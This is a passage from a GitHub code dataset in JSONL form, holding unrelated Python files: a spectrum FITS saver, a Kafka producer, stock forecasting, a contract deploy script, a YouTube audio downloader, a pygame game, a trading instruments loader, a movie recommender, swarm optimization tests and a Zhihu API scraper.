save_toml(self, filepath):\n serializable = copy.deepcopy(self)\n serializable.filters = [str(f) for f in serializable.filters]\n serializable = serializable.__dict__\n with open(filepath, 'w') as handle:\n handle.write(toml.dumps(serializable, encoder=toml.TomlNumpyEncoder()))\n\n def save_fits(self, filepath, bin_num=(0,)):\n \"\"\"\n Save the stacked spectrum for a specific bin to a FITS file.\n\n :param filepath: str\n The filepath to save to.\n :param bin_num: tuple\n Which bins to save. Default is (0,).\n :return:\n \"\"\"\n hdu = astropy.io.fits.HDUList()\n for b in bin_num:\n header = astropy.io.fits.Header()\n # Spectrum has already been corrected for redshift and extinction, so make these 0\n header['z'] = 0.\n header['ebv'] = 0.\n # Rem: \"Since we aren't really concerned with the exact values of these quantities\n # (since we're dealing with stacks, their actual kinematic quantities are meaningless),\n # you can set the FWHM resolution to something small like 0.1 A. \"\n header['fwhm'] = 0.1\n hdu.append(astropy.io.fits.PrimaryHDU(data=self.stacked_flux[b], header=header))\n hdu.append(astropy.io.fits.PrimaryHDU(data=self.universal_grid[b]))\n hdu.append(astropy.io.fits.PrimaryHDU(data=self.stacked_err[b]))\n hdu.writeto(filepath)\n return hdu\n\n def __repr__(self):\n s = f\"A collection of {len(self)} stacked spectra.\\n\"\n s += f\"Corrected: \\t {self.corrected}\\n\"\n s += f\"Stacked: \\t {True if len(self.stacked_flux) > 0 else False}\\n\"\n s += f\"Binned: \\t {'log_' if self.bin_log else ''}{self.binned}\"\n return s\n","repo_name":"Michael-Reefe/bifrost","sub_path":"bifrost/spectrum.py","file_name":"spectrum.py","file_ext":"py","file_size_in_byte":165575,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"14869500303","text":"from kafka import KafkaProducer\nfrom json import dumps\nimport time\nimport json\n\nproducer = KafkaProducer(\n acks = 0,\n bootstrap_servers = [\n \"spark-worker-01:9092\",\"spark-worker-02:9092\",\"spark-worker-03:9092\"\n ],\n value_serializer = lambda x: dumps(x).encode('utf-8')\n)\n\ntopic = 'tweet'\nstart = time.time()\nfor i in range(10):\n data = {'num': str(i)}\n producer.send(topic, value=data)\n producer.flush()\n time.sleep(2)\nprint('elapsed: ', time.time()-start)\n","repo_name":"skybluelee/Archeive","sub_path":"Docker/Kafka_Producer/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39087734393","text":"import yfinance as yf\nimport pandas as pd\nimport numpy as np\nfrom statsmodels.tsa.ar_model import AutoReg\nfrom statsmodels.tsa.statespace.sarimax import SARIMAX\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom statsmodels.tsa.holtwinters import SimpleExpSmoothing\nfrom statsmodels.tsa.holtwinters import ExponentialSmoothing\n\npredict_label = 'Adj Close'\n\ndef getData(ticker):\n return yf.download(ticker, period=\"max\")\n\n\n\ndef train_test(test_pr,ticker):\n test_pr = test_pr/100.0\n data = getData(ticker)\n dataLength = len(data)\n split_point = int((1-test_pr)*dataLength)\n train = data[:split_point]\n test = data[split_point:]\n return train,test\n\n\n#Forecast\ndef train_auto(train,test):\n y_hat = test.copy()\n model = AutoReg(train['Adj Close'],lags=1)\n model_fit = model.fit()\n return model_fit,y_hat\n\ndef train_arimax(train,test):\n y_hat = test.copy()\n model = ARIMA(train[predict_label],order=(5,1,1))\n model_fit = 
model.fit()\n return model_fit,y_hat\n\ndef train_ses(train,test):\n y_hat = test.copy()\n model = SimpleExpSmoothing(train[predict_label])\n model_fit = model.fit()\n return model_fit,y_hat\n\ndef train_es(train,test):\n y_hat = test.copy()\n model = ExponentialSmoothing(train[predict_label])\n model_fit = model.fit()\n return model_fit,y_hat\n\ndef predict(model,train,test,y_hat):\n return np.array(model.predict(start=len(train),end=len(train)+len(test)-1))\n#prediction\n\ndef run(ticker,test_pr,model_name='auto'):\n train,test = train_test(test_pr,ticker)\n if model_name == 'auto':\n model,y_hat = train_auto(train,test)\n forecast_name = 'AutoRegression'\n elif model_name == 'ses':\n model,y_hat = train_ses(train,test)\n forecast_name = 'Simple-Exp-Smoothing'\n elif model_name == 'es':\n model,y_hat = train_es(train,test)\n forecast_name = 'Expo-Smoothing'\n else:\n model,y_hat = train_arimax(train,test)\n forecast_name = 'Moving Average'\n \n y_hat[forecast_name] = predict(model,train,test,y_hat)\n return y_hat[[\"Adj Close\",forecast_name]],train\n \n\n","repo_name":"MilanVZinzuvadiya/StockPredict","sub_path":"stock_predict.py","file_name":"stock_predict.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"6053735369","text":"from brownie import PetRegistry, accounts, network, config, MockV3Aggregator\nfrom scripts.helpful_scripts import (\n get_account,\n LOCAL_BLOCKCHAIN_ENVIRONMENTS,\n)\n\n\ndef deploy_pet_registry():\n account = get_account()\n pet_registry = PetRegistry.deploy(\n {\"from\": account},\n publish_source=config[\"networks\"][network.show_active()].get(\"verify\"),\n ) # publish_source=True is used to verify the contract on Etherscan when dealing with non-local networks\n print(f\"Contract deployed to {pet_registry.address}\")\n return pet_registry\n\n\ndef main():\n deploy_pet_registry()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Omaralsaabi/pets","sub_path":"browniee/scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"43068412443","text":"import os\nfrom pytube import YouTube\n\n\nURLS_LIST_FILE = \"urls.txt\"\nMUSIC_OUTPUT_PATH = \"./music\"\n\n\nurls_to_fetch = []\n\nwith open(URLS_LIST_FILE, \"r\") as urls:\n for url in urls:\n urls_to_fetch.append((url.strip()))\n\nfor video_url in urls_to_fetch:\n yt = YouTube(video_url)\n video = yt.streams.filter(only_audio=True).first()\n out_file = video.download(output_path=MUSIC_OUTPUT_PATH)\n base, ext = os.path.splitext(out_file)\n new_file = base + \".mp3\"\n os.rename(out_file, new_file)\n print(yt.title + \" was downloaded successfully!\")","repo_name":"paulovitorweb/mp3-from-youtube","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"}
{"seq_id":"19898310082","text":"#Setting up the display.\r\n\r\nimport pygame\r\n\r\n#Size of the screen\r\nSCREEN_TITLE = \"Test Scenario\"\r\nSCREEN_WIDTH = 800\r\nSCREEN_HEIGHT = 800\r\n#Colors of the screen\r\nWHITE_COLOR = (255,255,255)\r\nBLACK_COLOR = (0,0,0)\r\nclock = pygame.time.Clock() # create the game clock\r\npygame.font.init()\r\nfont = pygame.font.SysFont('comicsans',75)\r\n\r\nclass Game:\r\n TICK_RATE = 60 #Set the FPS the game will run at.\r\n \r\n\r\n def 
    \r\n\r\n    def __init__(self, title, image_path, width, height):\r\n        self.title = title\r\n        self.width = width\r\n        self.height = height\r\n        \r\n        #Creating the window game screen, it uses a tuple of width and height\r\n        self.game_screen = pygame.display.set_mode((width, height))\r\n        #Setting the color of the screen\r\n        self.game_screen.fill(WHITE_COLOR)\r\n        #Sets the window title.\r\n        pygame.display.set_caption(title)\r\n\r\n        background_image = pygame.image.load(image_path)\r\n        self.image = pygame.transform.scale(background_image,(width,height))\r\n        \r\n    def run_game_loop(self):\r\n        \r\n        is_game_over = False\r\n        did_win = False\r\n        direction = 0\r\n\r\n        player_character = PlayerCharacter('player.png', 375, 700, 50, 50)\r\n        enemy_0 = EnemyCharacter('enemy.png', 20, 400, 50 , 50)\r\n        treasure = GameObject('treasure.png',375,50,50,50)\r\n        while not is_game_over:\r\n            \r\n            for event in pygame.event.get(): #all events, such as KEYPRESS, MOUSECLICK, MOUSEMOVEMENT\r\n                \r\n                if event.type == pygame.QUIT: #QUIT EVENTS ARE A PYGAME CONSTANT\r\n                    is_game_over = True\r\n                #Detect when key is pressed down\r\n                elif event.type == pygame.KEYDOWN:\r\n                    #Move up if up key pressed\r\n                    if event.key == pygame.K_UP:\r\n                        direction = 1\r\n                    #Move down if down key pressed    \r\n                    elif event.key == pygame.K_DOWN:\r\n                        direction = -1\r\n                    elif event.key == pygame.K_LEFT:\r\n                        direction = 2\r\n                    elif event.key == pygame.K_RIGHT:\r\n                        direction = -2\r\n                #detect when key is released\r\n                elif event.type == pygame.KEYUP:\r\n                    #Stop movement when key no longer pressed.\r\n                    if event.key in (pygame.K_UP, pygame.K_DOWN, pygame.K_RIGHT, pygame.K_LEFT):\r\n                        direction = 0
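\r\n                # Added note (hedged): direction encodes movement as 1/-1 for\r\n                # up/down and 2/-2 for left/right; PlayerCharacter.move() below\r\n                # decodes the same scheme.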
\r\n                \r\n                print(event)\r\n                \r\n            #Draws a rectangle on the game_screen in the color I want, at the position I want, with the width and height I want.\r\n            #From x0/y0 it is drawn down and to the right, so half of w and half of h must be subtracted from the position so it ends up centered. \r\n            ##pygame.draw.rect(game_screen, BLACK_COLOR,[350,350,100,100])\r\n            ##pygame.draw.circle(game_screen, BLACK_COLOR,(400,300),50)\r\n\r\n            #behaves like the rectangle; it goes here because its position has to be refreshed.\r\n            #game_screen.blit(player_image,(375,375))\r\n\r\n            #Redraw the screen to white.\r\n            self.game_screen.fill(WHITE_COLOR)\r\n            self.game_screen.blit(self.image,(0,0))\r\n            treasure.draw(self.game_screen)\r\n            \r\n            #Update player position\r\n            player_character.move(direction, self.height, self.width)\r\n            #Draw the player at the new position\r\n            player_character.draw(self.game_screen)\r\n\r\n            enemy_0.move(self.width)\r\n            enemy_0.draw(self.game_screen)\r\n            \r\n            if player_character.detectCollision(enemy_0):\r\n                is_game_over = True\r\n                did_win = False\r\n                text = font.render(\"You lost...\",True,BLACK_COLOR)\r\n                self.game_screen.blit(text,(275,350))\r\n                pygame.display.update()\r\n                clock.tick(1)\r\n                break\r\n            elif player_character.detectCollision(treasure):\r\n                is_game_over = True\r\n                did_win = True\r\n                text = font.render(\"YOU WIN!!\",True,BLACK_COLOR)\r\n                self.game_screen.blit(text,(275,350))\r\n                pygame.display.update()\r\n                clock.tick(1)\r\n                break\r\n            \r\n            pygame.display.update() #updates the rendered frame\r\n            clock.tick(self.TICK_RATE) #waits for the next frame\r\n\r\n        if did_win:\r\n            self.run_game_loop()\r\n        else:\r\n            return\r\n        \r\n\r\n#Generic game object class to be subclassed by other objects\r\nclass GameObject:\r\n\r\n\r\n    def __init__(self, image_path, x, y, width, height):\r\n\r\n        #loads the image into the project\r\n        object_image = pygame.image.load(image_path)\r\n        #resizes the image. Scales the image \r\n        self.image = pygame.transform.scale(object_image,(width, height))\r\n        \r\n        self.xPos = x\r\n        self.yPos = y\r\n\r\n        self.width = width\r\n        self.height = height\r\n\r\n    def draw(self, background):\r\n        background.blit(self.image, (self.xPos, self.yPos))\r\n\r\n#Class to represent the character controlled by the player    \r\nclass PlayerCharacter(GameObject):\r\n    #how many pixels the character moves per frame\r\n    SPEED = 6\r\n\r\n    def __init__(self, image_path, x, y, width, height):\r\n        super().__init__(image_path, x, y, width, height)\r\n    #Move function will move character up if direction > 0 and down if direction < 0\r\n    def move(self, direction, max_height, max_width):\r\n\r\n        if direction == 1:\r\n            self.yPos -= self.SPEED\r\n        elif direction == -1:\r\n            self.yPos += self.SPEED\r\n        elif direction == 2:\r\n            self.xPos -= self.SPEED\r\n        elif direction == -2:\r\n            self.xPos += self.SPEED\r\n\r\n        if self.yPos >= max_height - 55:\r\n            self.yPos = max_height - 55\r\n        elif self.yPos <= 0:\r\n            self.yPos = 0\r\n\r\n        if self.xPos >= max_width - 50:\r\n            self.xPos = max_width - 50\r\n        elif self.xPos <= 0:\r\n            self.xPos = 0\r\n    def detectCollision(self, otherBody):\r\n        if self.yPos > otherBody.yPos + otherBody.height:\r\n            return False\r\n        elif self.yPos + self.height < otherBody.yPos:\r\n            return False\r\n\r\n        if self.xPos > otherBody.xPos + otherBody.width:\r\n            return False\r\n        elif self.xPos + self.width < otherBody.xPos:\r\n            return False\r\n\r\n        return True
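\r\n\r\n# Added note (hedged): detectCollision above implements a standard AABB\r\n# (axis-aligned bounding box) test: two rectangles overlap exactly when they\r\n# overlap on both axes, so the four early-out separation checks are sufficient.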
\r\n\r\nclass EnemyCharacter(GameObject):\r\n    \r\n    SPEED = 6\r\n\r\n    def __init__(self, image_path, x, y, width, height):\r\n        super().__init__(image_path, x, y, width, height)\r\n    \r\n    def move(self, max_width):\r\n        if self.xPos <= 20:\r\n            self.SPEED = abs(self.SPEED)\r\n        elif self.xPos >= max_width - 70:\r\n            self.SPEED = -abs(self.SPEED)\r\n        self.xPos += self.SPEED\r\n\r\n\r\n\r\npygame.init() #initializes pygame.\r\n\r\nnew_game = Game(SCREEN_TITLE,'background.png',SCREEN_WIDTH,SCREEN_HEIGHT)\r\nnew_game.run_game_loop()\r\n    \r\n#Game loop: a while loop that contains all of the game logic.\r\npygame.quit() #exits the program\r\nquit() #exits the program\r\n","repo_name":"guustigimenez/Games","sub_path":"reachingTreasure.py","file_name":"reachingTreasure.py","file_ext":"py","file_size_in_byte":7314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20222159141","text":"#ask user for the name\nname = input(\"what is your nickname?\")\nwhile len(name) < 5:\n    print(\"is too short\")\n    name = input(\"what is your nickname?\")\nprint(\"nice to meet you,\", name.title())\n\n\n#Write a function that takes in a list of numbers.\n# It should return the sum of all the numbers in the list.\n\n\ndef add_numbers(list_of_numbers):\n    total = 0\n    for number in list_of_numbers:\n        total += number\n    return total\nthe_list =[1,1,1]\nprint(add_numbers(the_list))\n\n","repo_name":"lumicojo/exercises","sub_path":"python/while_loop.py","file_name":"while_loop.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13126138243","text":"import os\nimport logging\nimport json\n\nfrom config.config import get_server_config, get_timestamps_data, save_timestamps_data\nfrom core.controller import Controller\nfrom utils.utils import Utils\n\nclass Instruments:\n    instruments_list = None\n    symbol_to_instrument_map = None\n    token_to_instrument_map = None\n\n    @staticmethod\n    def should_fetch_from_server():\n        timestamps = get_timestamps_data()\n        if 'instrumentsLastSavedAt' not in timestamps:\n            return True\n        last_saved_timestamp = timestamps['instrumentsLastSavedAt']\n        now_epoch = Utils.get_epoch()\n        if now_epoch - last_saved_timestamp >= 24 * 60 * 60:\n            logging.info(\"Instruments: should_fetch_from_server() returning True as it's been 24 hours since last fetch.\")\n            return True\n        return False\n\n    @staticmethod\n    def update_last_saved_timestamp():\n        timestamps = get_timestamps_data()\n        timestamps['instrumentsLastSavedAt'] = Utils.get_epoch()\n        save_timestamps_data(timestamps)\n\n    @staticmethod\n    def load_instruments():\n        server_config = get_server_config()\n        instruments_file_path = os.path.join(server_config['deployDir'], 'instruments.json')\n        if not os.path.exists(instruments_file_path):\n            logging.warning('Instruments: instruments_file_path %s does not exist', instruments_file_path)\n            return [] # returns empty list\n\n        isd_file = open(instruments_file_path, 'r')\n        instruments = json.loads(isd_file.read())\n        logging.info('Instruments: loaded %d instruments from file %s', len(instruments), instruments_file_path)\n        return instruments\n\n    @staticmethod\n    def save_instruments(instruments = []):\n        server_config = get_server_config()\n        instruments_file_path = os.path.join(server_config['deployDir'], 'instruments.json')\n        with open(instruments_file_path, 'w') as isd_File:\n            json.dump(instruments, isd_File, indent=2, default=str)\n        logging.info('Instruments: Saved %d instruments to file %s', len(instruments), instruments_file_path)\n        \n        # Update last save timestamp\n        Instruments.update_last_saved_timestamp()\n\n    @staticmethod\n    def fetch_instruments_from_server():\n        instruments_list = []\n        try:\n            broker_handle = Controller.get_broker_login().get_broker_handle()\n            logging.info('Going to fetch instruments from server...')\n            instruments_list = broker_handle.instruments('NSE')\n
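            # Added note (hedged): broker_handle appears to follow a Kite-style\n            # instruments(exchange) dump API; another exchange could be merged in\n            # the same way, e.g. instruments_list.extend(broker_handle.instruments('BSE')).\n            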
instruments_list_fno = broker_handle.instruments('NFO')\n # Add FnO instrument list to the main list\n instruments_list.extend(instruments_list_fno)\n logging.info('Fetched %d instruments from server.', len(instruments_list))\n except Exception as e:\n logging.exception(\"Exception while fetching instruments from server\")\n return instruments_list\n\n @staticmethod\n def fetch_instruments():\n if Instruments.instruments_list:\n return Instruments.instruments_list\n\n instruments_list = Instruments.load_instruments()\n if len(instruments_list) == 0 or Instruments.should_fetch_from_server() == True:\n instruments_list = Instruments.fetch_instruments_from_server()\n # Save instruments to file locally\n if len(instruments_list) > 0:\n Instruments.save_instruments(instruments_list)\n\n if len(instruments_list) == 0:\n print(\"Could not fetch/load instruments data. Hence exiting the app.\")\n logging.error(\"Could not fetch/load instruments data. Hence exiting the app.\");\n exit(-2)\n \n Instruments.symbol_to_instrument_map = {}\n Instruments.token_to_instrument_map = {}\n for isd in instruments_list:\n trading_symbol = isd['tradingsymbol']\n instrument_token = isd['instrument_token']\n # logging.info('%s = %d', tradingSymbol, instrumentToken)\n Instruments.symbol_to_instrument_map[trading_symbol] = isd\n Instruments.token_to_instrument_map[instrument_token] = isd\n \n logging.info('Fetching instruments done. Instruments count = %d', len(instruments_list))\n # assign the list to static variable\n Instruments.instruments_list = instruments_list\n return instruments_list\n\n @staticmethod\n def get_instrument_data_by_symbol(trading_symbol):\n return Instruments.symbol_to_instrument_map[trading_symbol]\n\n @staticmethod\n def get_instrument_data_by_token(instrument_token):\n return Instruments.token_to_instrument_map[instrument_token]\n ","repo_name":"amoghkini/Algo-Trading-Framework","sub_path":"src/instruments/instruments.py","file_name":"instruments.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"3756443220","text":"import pandas as pd\nfrom surprise import Dataset\nfrom surprise import Reader\nfrom surprise.model_selection import cross_validate\nfrom surprise import prediction_algorithms\nfrom surprise import accuracy, evaluate\nimport csv\n\nuser_ratings_df = pd.read_csv('train.csv')\ntest_ratings_df = pd.read_csv('test.csv')\nuser_ratings_df = user_ratings_df.drop(columns=['Timestamp'])\n\nuser_ratings_df = user_ratings_df.append(test_ratings_df)\n\nmovie_names = user_ratings_df.columns.values.tolist()[5:]\nmovies_dict = {movie: id for id, movie in enumerate(movie_names)}\n\n\nmovie_ratings = []\nfor index, row in user_ratings_df.iterrows():\n for key in movies_dict.keys():\n movie_ratings.append((row['ID'], movies_dict[key], row[key]))\n\n\nmovie_ratings_df = pd.DataFrame.from_records(\n data=movie_ratings, columns=['userID', 'itemID', 'rating'])\n\nreader = Reader(rating_scale=(1, 5))\nmovie_ratings_df.dropna(inplace=True)\n\ndata = Dataset.load_from_df(\n movie_ratings_df[['userID', 'itemID', 'rating']], reader)\n\ndata = data.build_full_trainset()\n\n\"\"\" sim_options = {'name': 'pearson_baseline',\n 'user_based': True\n } \"\"\"\n\nalgo = prediction_algorithms.SVD(n_epochs=100)\nalgo.fit(data)\npredictions = []\nprint(\"Item Id for despicable Me \", movies_dict['Rating [Despicable Me]'])\nmovie_id = movies_dict['Rating [Despicable Me]']\nfor id in test_ratings_df['ID']:\n pred = 
algo.predict(iid=movie_id, uid=id)\n predictions.append((id, pred.est))\n\nop = open(\"predictions.csv\", \"w\")\nwr = csv.writer(op)\nwr.writerow([\"ID\", \"Rating [Despicable Me]\"])\nwr.writerows(predictions)\nop.close()\n# Test data prepare\n\"\"\" test_ratings_df = pd.read_csv('test.csv')\ntest_movie_ratings = []\nfor index, row in test_ratings_df.iterrows():\n for key in movies_dict.keys():\n test_movie_ratings.append((row['ID'], movies_dict[key], row[key]))\n\ntest_movie_ratings_df = pd.DataFrame.from_records(\n data=test_movie_ratings, columns=['ID', 'movieID', 'rating'])\n\ntest_data = Dataset.load_from_df(\n test_movie_ratings_df[['ID', 'movieID', 'rating']], reader) \"\"\"\n","repo_name":"Anuragis/Movie-Recommender","sub_path":"Movie-Recommender.py","file_name":"Movie-Recommender.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4885414700","text":"import logging\n\nimport numpy as np\nfrom .pipeline.graph import OptimizationGraph\nfrom .optimizer.swarm import Swarm\nfrom .optimizer.testfunctions import (\n rosenbrock,\n binhAndKorn,\n animateSwarm,\n animateSwarm2,\n rosenbrockContour,\n rosenbrockContourConstrained,\n)\n\n# Set logging formats\nlogging.basicConfig(\n level=logging.INFO,\n format=(\"[%(filename)8s] [%(levelname)4s] : %(funcName)s - %(message)s\"),\n)\n\n\nif __name__ == \"__main__\":\n\n # ========================================================\n\n CASE1 = True\n CASE2 = True\n CASE3 = True\n CASE4 = True\n\n # ========================================================\n if CASE1:\n logging.info(50 * \"=\")\n logging.info(\"CASE1 - Start Testing\")\n logging.info(50 * \"=\")\n\n itermax = 40\n xbounds = [(-5, 10), (0, 15)]\n ybounds = [(0, 13500)]\n cbounds = []\n\n def branin(X, a, b, c, r, s, t):\n return (\n a * (X[:, 1] - b * X[:, 0] ** 2 + c * X[:, 0] - r) ** 2\n + s * (1 - t) * np.cos(X[:, 0])\n + s,\n None,\n )\n\n swarm = Swarm(\n branin,\n xbounds,\n ybounds,\n cbounds,\n nparticles=10,\n minimumSwarmSize=10,\n args=(1, 5.1 / (4 * np.pi ** 2), 5 / np.pi, 6, 10, 1 / (8 * np.pi)),\n )\n swarm.initialize()\n swarm.iterate(itermax)\n\n swarm.restart()\n swarm.iterate(5)\n\n logging.info(swarm.xbest)\n logging.info(swarm.ybest)\n\n logging.info(\"CASE1 - passed :)\")\n\n # ========================================================\n if CASE2:\n logging.info(50 * \"=\")\n logging.info(\"CASE2 - Start Testing\")\n logging.info(50 * \"=\")\n\n # Define toolchain\n graph = OptimizationGraph(\n xdim=2,\n rdim=2,\n tindex=[0],\n cindex=[],\n xlabels=[\"x\", \"y\"],\n rlabels=[\"z\", \"c\"],\n )\n graph.singleProcessChain(rosenbrock)\n\n # Optimizer stuff\n itermax = 40\n xbounds = [(-4, 4), (-4, 4)]\n ybounds = [(0, 13500)]\n cbounds = []\n\n swarm = Swarm(\n graph.run, xbounds, ybounds, cbounds, nparticles=10, minimumSwarmSize=10\n )\n\n swarm.initialize()\n swarm.iterate(itermax)\n\n swarm.restart(resetParticles=False)\n swarm.iterate(5)\n\n # Postprocessing\n Xcine, Ycine = graph.postprocessAnimate()\n animateSwarm(Xcine, Ycine, rosenbrockContour, xbounds=xbounds, store=False)\n # tc.postprocess()\n\n logging.info(\"CASE2 - passed :)\")\n\n # ========================================================\n if CASE3:\n logging.info(50 * \"=\")\n logging.info(\"CASE3 - Start Testing\")\n logging.info(50 * \"=\")\n\n # Define toolchain\n graph = OptimizationGraph(\n xdim=2, rdim=4, tindex=[0, 1], cindex=[2, 3], xlabels=[\"x\", \"y\"]\n )\n 
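# Added note (hedged): binhAndKorn is the classic two-objective, two-constraint\n        # benchmark, so this case exercises the swarm on a constrained multi-objective\n        # problem; with tindex=[0, 1] it tracks a Pareto front rather than one optimum.\n        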
graph.singleProcessChain(binhAndKorn)\n\n # Optimizer stuff\n itermax = 30\n xbounds = [(0, 5), (0, 3)]\n ybounds = [(0, 60), (0, 60)]\n cbounds = [(0, 25), (7.7, 1e2)]\n\n swarm = Swarm(\n graph.run, xbounds, ybounds, cbounds, nparticles=10, minimumSwarmSize=10\n )\n swarm.initialize()\n swarm.iterate(itermax)\n\n Xcine, Ycine = graph.postprocessAnimate()\n animateSwarm2(Xcine, Ycine, xbounds=xbounds, ybounds=ybounds)\n # graph.postprocess()\n\n logging.info(\"CASE3 - passed :)\")\n\n # ========================================================\n if CASE4:\n logging.info(50 * \"=\")\n logging.info(\"CASE4 - Start Testing\")\n logging.info(50 * \"=\")\n # Define toolchain\n\n graph = OptimizationGraph(\n xdim=2,\n rdim=2,\n tindex=[0],\n cindex=[1],\n xlabels=[\"x\", \"y\"],\n rlabels=[\"z\", \"c\"],\n )\n graph.singleProcessChain(rosenbrock)\n\n # Optimizer stuff\n itermax = 20\n xbounds = [(-4, 4), (-4, 4)]\n ybounds = [(0, 13500)]\n cbounds = [(0, 1.3)]\n\n swarm = Swarm(\n graph.run, xbounds, ybounds, cbounds, nparticles=10, minimumSwarmSize=10\n )\n\n swarm.initialize()\n swarm.iterate(itermax)\n\n # swarm.restart(resetParticles=True)\n # swarm.iterate(5)\n\n Xcine, Ycine = graph.postprocessAnimate()\n animateSwarm(\n Xcine, Ycine, rosenbrockContourConstrained, xbounds=xbounds, store=False\n )\n # tc.postprocess()\n logging.info(\"CASE4 - passed :)\")\n","repo_name":"cmb87/MultiobjectiveOptimization","sub_path":"moop/test_swarm.py","file_name":"test_swarm.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1612018137","text":"from fly import config\nfrom fly.gui import constants as c\nfrom fly.gui import genericelements as gel\nfrom fly.gui import helpers as guihelpers\nfrom fly.gui.elements import interface\n\n\nclass SpeedBarGUI(interface.GUIElementInterface):\n\n \"\"\"Horizontal bar on screen which fills as the speed increases.\n This speed bar is empty to start and grows as the number of words\n increases until the number of words reaches the max (set in constants).\n \n Its colour is green if accuracy is 100% and gradually goes red as accuracy\n drops.\n\n Additionally, the words per minute (wpm) and accuracy are displayed in a\n label on the bar.\n \"\"\"\n \n def __init__(self):\n self.speed_blocks = []\n self.display_bar = config.DISPLAY_SPEED_BAR\n self.number_of_bars_to_display = 0\n\n self.__create_speed_bar_underlay()\n self.__create_speed_bar()\n\n def __create_speed_bar_underlay(self):\n\n \"\"\"Create the base speed bar to display on screen.\"\"\"\n\n speed_bar_x_pos = guihelpers.centred_for_x(c.SPEED_BAR_WIDTH)\n self.speed_bar_underlay = \\\n gel.DisplayPanel((speed_bar_x_pos, \n c.SPEED_BAR_Y),\n (c.SPEED_BAR_WIDTH, c.SPEED_BAR_HEIGHT), \n \"SPEED/ACCURACY: \", \n c.SPEED_BAR_BACKGROUND_COLOR, \n c.SPEED_BAR_TEXT_COLOR, \n c.SPEED_BAR_TEXT_MARGIN)\n\n def __create_speed_bar(self):\n\n \"\"\"Create the stripe that indicates speed.\"\"\"\n\n for i in range(c.SPEED_BAR_BLOCK_COUNT):\n speed_bar_block = \\\n gel.SpeedBarBlock((guihelpers.speed_bar_pos_x(i),\n c.SPEED_BAR_Y + 20),\n (c.SPEED_BAR_BLOCK_WIDTH, 2),\n (0,0,0))\n self.speed_blocks.append(speed_bar_block)\n\n def toggle_display(self):\n\n \"\"\"Toggle display of speed bar.\"\"\"\n\n self.display_bar = (not self.display_bar)\n\n def set_words_per_minute(self, words_per_minute):\n\n \"\"\"Display the number of words per minute the user is typing.\n Display it in the length of the speed bar, and as a text 
label.\n\n        @param words_per_minute: number of words per minute user is typing\n        @type words_per_minute: float\n        \"\"\"\n\n        self.speed_bar_underlay.append_text(\" wpm: %s, \" \n                                            % int(round(words_per_minute, 0)))\n        speed_bar_len_float = min(words_per_minute/c.SPEED_BAR_MAX_SPEED, 1)\n        speed_bar_length = int(c.SPEED_BAR_BLOCK_COUNT*(speed_bar_len_float))\n\n        self.number_of_bars_to_display = int(speed_bar_length)\n\n    def set_accuracy(self, accuracy):\n\n        \"\"\"Display the accuracy the user is typing with as fraction correct.\n        Accuracy is displayed in the colour of the speed bar, and as a text\n        label.\n\n        @param accuracy: number words correct/total number of words\n        @type accuracy: float\n        \"\"\"\n        \n        # Arbitrary choice of brightness\n        color_brightness = 0.4\n\n        max_eight_bit_brightness = 255\n        accuracy_color = max_eight_bit_brightness*accuracy\n        self.speed_bar_underlay.append_text(\"accuracy: %s\" \n                                            % int(round((accuracy * 100), 2)))\n\n        red = int((max_eight_bit_brightness-accuracy_color)*color_brightness)\n        green = int(accuracy_color*color_brightness)\n        blue = 0\n\n        speed_bar_color = (red, green, blue)\n        for speed_bar_block in self.speed_blocks:\n            speed_bar_block.set_color(speed_bar_color)\n        \n    def draw(self, surface):\n\n        \"\"\"Draw speed bar on screen.\"\"\"\n\n        if self.display_bar:\n            self.speed_bar_underlay.blit_on(surface)\n\n            for i in range(self.number_of_bars_to_display):\n                self.speed_blocks[i].blit_on(surface)\n\n\n","repo_name":"openstenotype/steno-tutor","sub_path":"gui/elements/speedbar.py","file_name":"speedbar.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73548380897","text":"import json\nfrom lxml import etree\nimport requests\n\nheaders = {\n    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36',\n}\n\nresponse = requests.get('https://www.zhihu.com/api/v4/members/excited-vczh/followees?include=data%5B%2A%5D.answer_count%2Carticles_count%2Cgender%2Cfollower_count%2Cis_followed%2Cis_following%2Cbadge%5B%3F%28type%3Dbest_answerer%29%5D.topics&limit=20&offset=20',headers=headers)\ndata = json.loads(response.text)\nusers = data.get('data')\nprint(users)\nif response.status_code == 200:\n    print('111')\n    data = json.loads(response.text)\n    print(type(data))\n    next_url = data.get('paging').get('next')\n    print(next_url)\n    print(type(next_url))\n    print('222')\n    # get the array of users\n    users = data.get('data')\n    # each user's info is a single dictionary\n    for user in users:\n        user_url = user.get('url_token')\n        print(user_url)\n        print(type(user_url))\n","repo_name":"yuebanwanwan/zhihustar","sub_path":"zhihustar/spiders/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2869638866","text":"class 